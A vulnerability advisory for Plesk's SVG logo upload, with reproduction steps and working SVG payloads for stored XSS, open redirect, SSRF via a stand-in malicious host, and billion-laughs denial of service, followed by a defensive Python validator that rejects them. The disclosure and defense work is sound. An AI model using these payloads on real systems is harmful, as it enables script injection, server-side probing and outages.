
Plesk Insecure File Upload – Multiple Vulnerabilities

An insecure upload function was discovered in the Plesk branding logo feature.
By uploading a crafted SVG file as the logo, an attacker can achieve stored XSS, open redirection, SSRF and XXE (including entity-expansion denial of service).

Product: https://www.plesk.com/

Tested Version: Plesk Obsidian 18.0.35 Update #1

Fixed version: Plesk Obsidian 18.0.37

STEPS TO REPRODUCE:
1. Go to: https://domain.com/plesk/logo/
2. Upload an SVG file with the malicious content as the branding logo.
3. Return to the main web page, right-click the brand logo and select "Open image in new tab". The SVG is then rendered as a document rather than embedded as an image, and its script executes.

_______________POC XSS_______________
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>

_______________POC_REDIRECTION_______________
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>

______________POC_SSRF_______________
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<image height="30" width="30"
xlink:href="https://malicious.site/malicious.php" />
</svg>

Check the source address of the callback that reaches malicious.site: a request from the Plesk host means the server itself fetched the reference (SSRF), whereas a request from the viewer's address means only the browser that opened the logo loaded it.

_________POC_XXE_BILLION_LAUGHS_READ_NOTE_PLS____________

!!!!!!!!!!!!!!!!!!IMPORTANT NOTE!!!!!!!!!!!!!!!!!!!!!!!!!!!
DO NOT USE THIS ON PRODUCTION ENVIRONMENT, IT CAUSES A DENIAL OF SERVICE

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="23" x="8" y="28"></text>
</svg>
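The validator below is an added example, not Plesk code and not the fix shipped in 18.0.37. It shows the allow-list checks an upload handler for the logo needs in order to refuse each of the four PoCs above: DOCTYPE and ENTITY declarations (XXE, billion laughs), script elements and on* event attributes (XSS, redirection), and href values that point outside the document (SSRF). The sample inputs are constructed from the PoCs on this page; the contents of FORBIDDEN_ELEMENTS and URL_ATTRIBUTES are this example's policy choices, not a Plesk setting, and the validator uses only the Python standard library.

```python
"""Allow-list validator for uploaded SVG logos (added example, not Plesk code).

It refuses the primitives the four PoCs on this page rely on: DOCTYPE and
ENTITY declarations (XXE / billion laughs), <script> and event handler
attributes (XSS, redirection) and href values pointing outside the document
(SSRF). Parsing is aborted on the first finding, so a DOCTYPE is rejected
before any entity could be expanded.
"""
import xml.parsers.expat
from typing import Optional

# Policy choice for this example: elements that execute script, embed foreign
# content, or can rewrite attributes such as href after validation.
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object",
                      "animate", "set"}
# Attributes that carry a URL; only same-document fragments ("#id") pass.
URL_ATTRIBUTES = {"href", "src"}


class SvgRejected(Exception):
    """Raised inside an expat handler to stop parsing immediately."""


def _local(qname: str) -> str:
    """'xlink:href' -> 'href'; unprefixed names pass through unchanged."""
    return qname.rsplit(":", 1)[-1]


def validate_svg(data: bytes) -> Optional[str]:
    """Return None if the upload is acceptable, otherwise a rejection reason."""
    root = []  # local name of the first element seen

    def reject(reason: str):
        raise SvgRejected(reason)

    def start_element(name, attrs):
        local = _local(name)
        if not root:
            root.append(local)
            if local != "svg":
                reject(f"root element is <{local}>, expected <svg>")
        if local in FORBIDDEN_ELEMENTS:
            reject(f"<{local}> element not allowed")
        for attr, value in attrs.items():
            a = _local(attr)
            if a.lower().startswith("on"):
                reject(f"event handler attribute {attr} not allowed")
            if a in URL_ATTRIBUTES and not value.strip().startswith("#"):
                reject(f"external reference in {attr}={value!r} not allowed")
            if a == "style" and "url(" in value.lower():
                reject("style attribute with url() not allowed")

    parser = xml.parsers.expat.ParserCreate()
    # Declarations are refused as soon as they are seen, before any content
    # that could reference (and expand) them is parsed.
    parser.StartDoctypeDeclHandler = lambda *_: reject("DOCTYPE declaration not allowed")
    parser.EntityDeclHandler = lambda *_: reject("ENTITY declaration not allowed")
    # <?xml-stylesheet ...?> can pull in an external stylesheet; the XML
    # declaration itself is not a processing instruction and is unaffected.
    parser.ProcessingInstructionHandler = lambda *_: reject("processing instruction not allowed")
    parser.StartElementHandler = start_element
    try:
        parser.Parse(data, True)
    except SvgRejected as exc:
        return str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return f"not well-formed XML: {exc}"
    return None if root else "empty document"


# Constructed test inputs: the PoCs from this page (billion laughs shortened
# to two entity levels) plus a benign logo that must be accepted.
POCS = {
    "xss": b'<?xml version="1.0" standalone="no"?>\n'
           b'<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" '
           b'"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">\n'
           b'<svg version="1.1" xmlns="http://www.w3.org/2000/svg">'
           b'<script type="text/javascript">alert("XSS")</script></svg>',
    # same payload without the DOCTYPE, so the <script> check itself is exercised
    "xss_no_doctype": b'<svg xmlns="http://www.w3.org/2000/svg">'
                      b'<script>alert("XSS")</script></svg>',
    "redirect": b'<svg onload="window.location=\'http://www.example.com\'" '
                b'xmlns="http://www.w3.org/2000/svg"></svg>',
    "ssrf": b'<svg xmlns="http://www.w3.org/2000/svg" '
            b'xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<image height="30" width="30" '
            b'xlink:href="https://malicious.site/malicious.php"/></svg>',
    "billion_laughs": b'<?xml version="1.0" standalone="yes"?>\n<!DOCTYPE lolz [\n'
                      b'<!ENTITY lol "lol">\n'
                      b'<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n'
                      b']>\n<lolz>&lol1;</lolz>',
}
BENIGN_LOGO = (b'<svg xmlns="http://www.w3.org/2000/svg" width="128" height="128">'
               b'<rect x="8" y="8" width="112" height="112" fill="#0a5"/>'
               b'<text x="16" y="72" font-size="23">Logo</text></svg>')

if __name__ == "__main__":
    for name, sample in POCS.items():
        print(f"{name:15} -> {validate_svg(sample)}")
    print(f"{'benign':15} -> {validate_svg(BENIGN_LOGO)}")
```

Rejecting rather than sanitising keeps the policy auditable; note that the href rule also refuses data: URIs, so loosen it deliberately if embedded raster logos are required. Independently of validation, serving uploaded logos with a Content-Disposition: attachment header or a restrictive Content-Security-Policy limits what a file that slips through can do when a user opens it directly, which is exactly the step the reproduction above relies on.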
